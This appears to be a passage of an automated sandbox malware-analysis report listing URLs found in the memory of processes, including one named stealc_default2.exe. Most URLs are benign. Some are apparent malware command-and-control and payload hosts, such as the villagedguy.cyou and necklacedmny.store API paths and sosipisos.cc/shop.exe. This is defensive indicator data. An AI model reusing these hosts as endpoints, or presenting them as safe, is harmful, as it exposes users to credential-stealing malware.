                          Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2700906047.0000229800238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                          Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2767972444.00002B3C009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2700906047.0000229800238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                          Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                          Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                          Source: chrome.exe, 0000002B.00000003.2265759074.00002298006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703422989.0000229800744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2269345057.00002298006EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                          Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                          Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                          Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                          Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3474564441.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443810612.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461071670.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3444015191.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2398275478.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345731366.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3087852951.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/F
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3474564441.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443810612.0000000000F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/N
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3473998772.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/O
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiB
                          Source: 550b7cfe5f.exe, 0000002A.00000003.3109929770.0000000000F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiX
                          Source: 550b7cfe5f.exe, 0000002A.00000003.3109929770.0000000000F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apip
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/f
                          Source: 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3444015191.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recapt
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                          Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                          Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sosipisos.cc/
                          Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sosipisos.cc/shop.exeeK
                          Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sosipisos.cc/shop.exezKU
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                          Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900bf
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowere
                          Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowere&
                          Source: new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowereW
                          Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                          Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
                          Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/6
                          Source: new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api
                          Source: new_v8.exe, 00000016.00000003.2526420431.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api#P
                          Source: new_v8.exe, 00000016.00000003.2853535555.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api(ws
                          Source: new_v8.exe, 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api0
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api3
                          Source: new_v8.exe, 00000016.00000003.2415792676.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/api9
                          Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apiC
                          Source: new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apie
                          Source: new_v8.exe, 00000016.00000003.2254203334.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256699750.0000000000BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apila
                          Source: new_v8.exe, 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apime
                          Source: new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476025408.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476112648.0000000000BF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/apip
                          Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou/s
                          Source: new_v8.exe, 00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2404258386.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2460996534.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476025408.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2779671424.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou:443/api
                          Source: new_v8.exe, 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villagedguy.cyou:443/api4
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
